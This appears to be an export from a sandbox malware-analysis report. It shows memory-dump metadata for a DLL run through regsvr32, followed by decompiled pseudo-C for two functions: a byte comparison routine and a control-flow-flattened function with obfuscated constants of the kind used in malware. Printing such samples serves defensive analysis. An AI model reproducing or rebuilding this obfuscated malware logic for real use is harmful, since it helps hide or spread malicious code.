                                                                                                                0x1003dee5
                                                                                                                0x1003dee8
                                                                                                                0x1003deec
                                                                                                                0x1003deee
                                                                                                                0x1003df05
                                                                                                                0x1003df05
                                                                                                                0x1003df09
                                                                                                                0x1003df0d
                                                                                                                0x1003df0f
                                                                                                                0x1003df26
                                                                                                                0x1003df26
                                                                                                                0x1003df2a
                                                                                                                0x1003df2e
                                                                                                                0x1003df30
                                                                                                                0x1003df47
                                                                                                                0x1003df47
                                                                                                                0x1003df4b
                                                                                                                0x1003df4f
                                                                                                                0x1003df51
                                                                                                                0x1003df57
                                                                                                                0x1003df5a
                                                                                                                0x1003df5e
                                                                                                                0x1003df5e
                                                                                                                0x00000000
                                                                                                                0x1003df51
                                                                                                                0x1003df36
                                                                                                                0x1003df39
                                                                                                                0x1003df3d
                                                                                                                0x1003df41
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003df41
                                                                                                                0x1003df15
                                                                                                                0x1003df18
                                                                                                                0x1003df1c
                                                                                                                0x1003df20
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003df20
                                                                                                                0x1003def4
                                                                                                                0x1003def7
                                                                                                                0x1003defb
                                                                                                                0x1003deff
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003deff
                                                                                                                0x1003db02
                                                                                                                0x1003db02
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                • Instruction ID: d8d6a0d1d601d6d19846f2a888380698ae7eb6c7cf68485d33b6dbe59a4135aa
                                                                                                                • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                • Instruction Fuzzy Hash: D5C17EB3C0A9F34E8377C52D546862BEEA2AFC169271BC3E2CCD43F289D6265D0495D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003DB09 Relevance: .4, Instructions: 351COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003DB09(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}































                                                                                                                0x1003db09
                                                                                                                0x1003db09
                                                                                                                0x1003db0f
                                                                                                                0x1003db82
                                                                                                                0x1003db84
                                                                                                                0x1003db86
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003db8c
                                                                                                                0x1003db92
                                                                                                                0x1003dc11
                                                                                                                0x1003dc13
                                                                                                                0x1003dc15
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dc1b
                                                                                                                0x1003dc21
                                                                                                                0x1003dca0
                                                                                                                0x1003dca2
                                                                                                                0x1003dca4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dcaa
                                                                                                                0x1003dcb0
                                                                                                                0x1003dd2f
                                                                                                                0x1003dd31
                                                                                                                0x1003dd33
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dd3f
                                                                                                                0x1003ddbf
                                                                                                                0x1003ddc1
                                                                                                                0x1003ddc3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ddc9
                                                                                                                0x1003ddcf
                                                                                                                0x1003de4e
                                                                                                                0x1003de50
                                                                                                                0x1003de52
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003de58
                                                                                                                0x1003de5e
                                                                                                                0x1003decf
                                                                                                                0x1003ded1
                                                                                                                0x1003ded3
                                                                                                                0x1003ded5
                                                                                                                0x1003ded5
                                                                                                                0x1003ded7
                                                                                                                0x1003ec33
                                                                                                                0x1003ec33
                                                                                                                0x1003de67
                                                                                                                0x1003de69
                                                                                                                0x1003de7a
                                                                                                                0x1003de82
                                                                                                                0x1003de84
                                                                                                                0x1003de95
                                                                                                                0x1003de9d
                                                                                                                0x1003de9f
                                                                                                                0x1003deb4
                                                                                                                0x1003debc
                                                                                                                0x1003debe
                                                                                                                0x1003decb
                                                                                                                0x1003decb
                                                                                                                0x00000000
                                                                                                                0x1003debe
                                                                                                                0x1003dea8
                                                                                                                0x1003deae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003deb0
                                                                                                                0x1003deb0
                                                                                                                0x00000000
                                                                                                                0x1003deb0
                                                                                                                0x1003de8d
                                                                                                                0x1003de93
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003de93
                                                                                                                0x1003de72
                                                                                                                0x1003de78
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003de78
                                                                                                                0x1003ddd8
                                                                                                                0x1003ddda
                                                                                                                0x1003ddf1
                                                                                                                0x1003ddf9
                                                                                                                0x1003ddfb
                                                                                                                0x1003de12
                                                                                                                0x1003de1a
                                                                                                                0x1003de1c
                                                                                                                0x1003de33
                                                                                                                0x1003de3b
                                                                                                                0x1003de3d
                                                                                                                0x1003de4a
                                                                                                                0x1003de4a
                                                                                                                0x00000000
                                                                                                                0x1003de3d
                                                                                                                0x1003de29
                                                                                                                0x1003de2d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003de2d
                                                                                                                0x1003de08
                                                                                                                0x1003de0c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003de0c
                                                                                                                0x1003dde7
                                                                                                                0x1003ddeb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ddeb
                                                                                                                0x1003dd49
                                                                                                                0x1003dd4b
                                                                                                                0x1003dd62
                                                                                                                0x1003dd6a
                                                                                                                0x1003dd6c
                                                                                                                0x1003dd83
                                                                                                                0x1003dd8b
                                                                                                                0x1003dd8d
                                                                                                                0x1003dda4
                                                                                                                0x1003ddac
                                                                                                                0x1003ddae
                                                                                                                0x1003ddbb
                                                                                                                0x1003ddbb
                                                                                                                0x00000000
                                                                                                                0x1003ddae
                                                                                                                0x1003dd9a
                                                                                                                0x1003dd9e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dd9e
                                                                                                                0x1003dd79
                                                                                                                0x1003dd7d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dd7d
                                                                                                                0x1003dd58
                                                                                                                0x1003dd5c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dd5c
                                                                                                                0x1003dcb9
                                                                                                                0x1003dcbb
                                                                                                                0x1003dcd2
                                                                                                                0x1003dcda
                                                                                                                0x1003dcdc
                                                                                                                0x1003dcf3
                                                                                                                0x1003dcfb
                                                                                                                0x1003dcfd
                                                                                                                0x1003dd14
                                                                                                                0x1003dd1c
                                                                                                                0x1003dd1e
                                                                                                                0x1003dd2b
                                                                                                                0x1003dd2b
                                                                                                                0x00000000
                                                                                                                0x1003dd1e
                                                                                                                0x1003dd0a
                                                                                                                0x1003dd0e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dd0e
                                                                                                                0x1003dce9
                                                                                                                0x1003dced
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dced
                                                                                                                0x1003dcc8
                                                                                                                0x1003dccc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dccc
                                                                                                                0x1003dc2a
                                                                                                                0x1003dc2c
                                                                                                                0x1003dc43
                                                                                                                0x1003dc4b
                                                                                                                0x1003dc4d
                                                                                                                0x1003dc64
                                                                                                                0x1003dc6c
                                                                                                                0x1003dc6e
                                                                                                                0x1003dc85
                                                                                                                0x1003dc8d
                                                                                                                0x1003dc8f
                                                                                                                0x1003dc9c
                                                                                                                0x1003dc9c
                                                                                                                0x00000000
                                                                                                                0x1003dc8f
                                                                                                                0x1003dc7b
                                                                                                                0x1003dc7f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dc7f
                                                                                                                0x1003dc5a
                                                                                                                0x1003dc5e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dc5e
                                                                                                                0x1003dc39
                                                                                                                0x1003dc3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dc3d
                                                                                                                0x1003db9b
                                                                                                                0x1003db9d
                                                                                                                0x1003dbb4
                                                                                                                0x1003dbbc
                                                                                                                0x1003dbbe
                                                                                                                0x1003dbd5
                                                                                                                0x1003dbdd
                                                                                                                0x1003dbdf
                                                                                                                0x1003dbf6
                                                                                                                0x1003dbfe
                                                                                                                0x1003dc00
                                                                                                                0x1003dc0d
                                                                                                                0x1003dc0d
                                                                                                                0x00000000
                                                                                                                0x1003dc00
                                                                                                                0x1003dbec
                                                                                                                0x1003dbf0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dbf0
                                                                                                                0x1003dbcb
                                                                                                                0x1003dbcf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dbcf
                                                                                                                0x1003dbaa
                                                                                                                0x1003dbae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003db11
                                                                                                                0x1003db11
                                                                                                                0x1003db14
                                                                                                                0x1003db18
                                                                                                                0x1003db1a
                                                                                                                0x1003db2d
                                                                                                                0x1003db2d
                                                                                                                0x1003db31
                                                                                                                0x1003db35
                                                                                                                0x1003db37
                                                                                                                0x1003db4a
                                                                                                                0x1003db4a
                                                                                                                0x1003db4e
                                                                                                                0x1003db52
                                                                                                                0x1003db54
                                                                                                                0x1003db67
                                                                                                                0x1003db67
                                                                                                                0x1003db6b
                                                                                                                0x1003db6f
                                                                                                                0x1003db71
                                                                                                                0x1003db77
                                                                                                                0x1003db7a
                                                                                                                0x1003db7e
                                                                                                                0x1003db7e
                                                                                                                0x00000000
                                                                                                                0x1003db71
                                                                                                                0x1003db5a
                                                                                                                0x1003db5d
                                                                                                                0x1003db61
                                                                                                                0x1003db65
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003db65
                                                                                                                0x1003db3d
                                                                                                                0x1003db40
                                                                                                                0x1003db44
                                                                                                                0x1003db48
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003db48
                                                                                                                0x1003db20
                                                                                                                0x1003db23
                                                                                                                0x1003db27
                                                                                                                0x1003db2b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003db2b
                                                                                                                0x1003db02
                                                                                                                0x1003db02
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                • Instruction ID: 2e43dce44dd0faa1b493887848bd187ca71d37d475df302aaa9970346dca1e70
                                                                                                                • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                • Instruction Fuzzy Hash: 17C17E73D1A9F34E8377D52D605852BEEA2EFC168271BC3A2CCD42F289D6269D04D6D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B8966 Relevance: .2, Instructions: 194COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001B8966() {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _t202;
				void* _t203;
				void* _t209;
				intOrPtr _t211;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int* _t245;

				_t245 =  &_v612;
				_v528 = _v528 & 0x00000000;
				_v536 = 0xeb8db9;
				_t209 = 0x75dff71;
				_v532 = 0x6cdcaa;
				_v584 = 0x675c1e;
				_t237 = 0x7b;
				_v584 = _v584 / _t237;
				_v584 = _v584 + 0xffff56df;
				_v584 = _v584 ^ 0x000a8d6f;
				_v540 = 0xad351e;
				_t238 = 0x1d;
				_v540 = _v540 / _t238;
				_v540 = _v540 ^ 0x000cd12f;
				_v576 = 0x271ad6;
				_v576 = _v576 << 9;
				_v576 = _v576 | 0x8da31b46;
				_v576 = _v576 ^ 0xcfba0ab5;
				_v568 = 0x7638f3;
				_t239 = 0x21;
				_v568 = _v568 * 0x4c;
				_v568 = _v568 + 0xffff8105;
				_v568 = _v568 ^ 0x23140abb;
				_v556 = 0x9e4795;
				_v556 = _v556 / _t239;
				_v556 = _v556 ^ 0x00071ff3;
				_v596 = 0x7c130f;
				_v596 = _v596 ^ 0x52e063cf;
				_t240 = 0x3a;
				_v596 = _v596 * 0x43;
				_v596 = _v596 * 0x58;
				_v596 = _v596 ^ 0xa3079607;
				_v588 = 0xa0c18c;
				_v588 = _v588 >> 6;
				_v588 = _v588 >> 0xa;
				_v588 = _v588 ^ 0x000549a9;
				_v544 = 0xa78eb4;
				_v544 = _v544 << 6;
				_v544 = _v544 ^ 0x29e5c01f;
				_v600 = 0xcf7d6f;
				_v600 = _v600 + 0xffff5289;
				_v600 = _v600 + 0xffff5d0e;
				_v600 = _v600 << 8;
				_v600 = _v600 ^ 0xce2a9719;
				_v608 = 0x771f9e;
				_v608 = _v608 / _t240;
				_v608 = _v608 >> 1;
				_t241 = 0x5c;
				_v608 = _v608 / _t241;
				_v608 = _v608 ^ 0x0003fb75;
				_v612 = 0xc09b6c;
				_v612 = _v612 * 0x64;
				_v612 = _v612 + 0x7cd4;
				_t242 = 0xf;
				_v612 = _v612 / _t242;
				_v612 = _v612 ^ 0x05041644;
				_v604 = 0xdc0665;
				_v604 = _v604 + 0x32d4;
				_v604 = _v604 >> 0xe;
				_v604 = _v604 << 0xf;
				_v604 = _v604 ^ 0x01b2fa9a;
				_v552 = 0x185fb3;
				_v552 = _v552 + 0xffffcadd;
				_v552 = _v552 ^ 0x001fa7be;
				_v560 = 0x669eb5;
				_v560 = _v560 ^ 0xcc2d92e9;
				_v560 = _v560 ^ 0xcc4722a4;
				_v580 = 0x2299ca;
				_v580 = _v580 | 0xb5d9d5ef;
				_v580 = _v580 >> 0xb;
				_v580 = _v580 ^ 0x00165e21;
				_v564 = 0xc1eeb0;
				_v564 = _v564 | 0x20ff1cb5;
				_v564 = _v564 * 0x2c;
				_v564 = _v564 ^ 0xabfc8e66;
				_v548 = 0x7128f3;
				_v548 = _v548 + 0xffff1d40;
				_v548 = _v548 ^ 0x0074511b;
				_v572 = 0x274fdc;
				_v572 = _v572 | 0xd7121b37;
				_v572 = _v572 + 0xc0c3;
				_v572 = _v572 ^ 0xd7349354;
				_v592 = 0x173abb;
				_v592 = _v592 ^ 0x7790976d;
				_t202 = _v592 * 0x2d;
				_v592 = _t202;
				_v592 = _v592 << 2;
				_v592 = _v592 ^ 0x0b689a9b;
				do {
					while(_t209 != 0x5c9141b) {
						if(_t209 == 0x75dff71) {
							_t209 = 0x5c9141b;
							continue;
						}
						if(_t209 == 0x8d656b2) {
							return E001B7098( &_v524,  &_v524, E001B6998, _v548, 0, _v572, _v592);
						}
						if(_t209 != 0xc9a6393) {
							goto L8;
						}
						_t202 = E001A2263( &_v524, _v552, _v560, _v580);
						 *_t202 = 0;
						_t209 = 0x8d656b2;
					}
					_push(_v568);
					_push(0x1a109c);
					_push(_v576);
					_t203 = E001BF5D9(_v584, _v540, __eflags);
					_t211 =  *0x1c4c10; // 0x67d820
					_t175 = _t211 + 4; // 0x67d824
					__eflags = _t211 + 0x20c;
					E001B8EB3(_t175, _t211 + 0x20c, _v556, _v584, _v596,  &_v524, _v588, _t203, _v544);
					_t202 = E001BF94B(_t203, _v600, _v608, _v612, _v604);
					_t245 =  &(_t245[0xd]);
					_t209 = 0xc9a6393;
					L8:
					__eflags = _t209 - 0x92e6efe;
				} while (__eflags != 0);
				return _t202;
			}





































                                                                                                                0x001b8966
                                                                                                                0x001b896c
                                                                                                                0x001b8973
                                                                                                                0x001b897b
                                                                                                                0x001b8980
                                                                                                                0x001b8988
                                                                                                                0x001b899a
                                                                                                                0x001b899f
                                                                                                                0x001b89a5
                                                                                                                0x001b89ad
                                                                                                                0x001b89b5
                                                                                                                0x001b89c1
                                                                                                                0x001b89c6
                                                                                                                0x001b89cc
                                                                                                                0x001b89d4
                                                                                                                0x001b89dc
                                                                                                                0x001b89e1
                                                                                                                0x001b89e9
                                                                                                                0x001b89f1
                                                                                                                0x001b89fe
                                                                                                                0x001b8a01
                                                                                                                0x001b8a05
                                                                                                                0x001b8a0d
                                                                                                                0x001b8a15
                                                                                                                0x001b8a25
                                                                                                                0x001b8a29
                                                                                                                0x001b8a31
                                                                                                                0x001b8a39
                                                                                                                0x001b8a46
                                                                                                                0x001b8a49
                                                                                                                0x001b8a52
                                                                                                                0x001b8a56
                                                                                                                0x001b8a5e
                                                                                                                0x001b8a66
                                                                                                                0x001b8a6b
                                                                                                                0x001b8a70
                                                                                                                0x001b8a78
                                                                                                                0x001b8a80
                                                                                                                0x001b8a85
                                                                                                                0x001b8a8d
                                                                                                                0x001b8a95
                                                                                                                0x001b8a9d
                                                                                                                0x001b8aa5
                                                                                                                0x001b8aaa
                                                                                                                0x001b8ab2
                                                                                                                0x001b8ac2
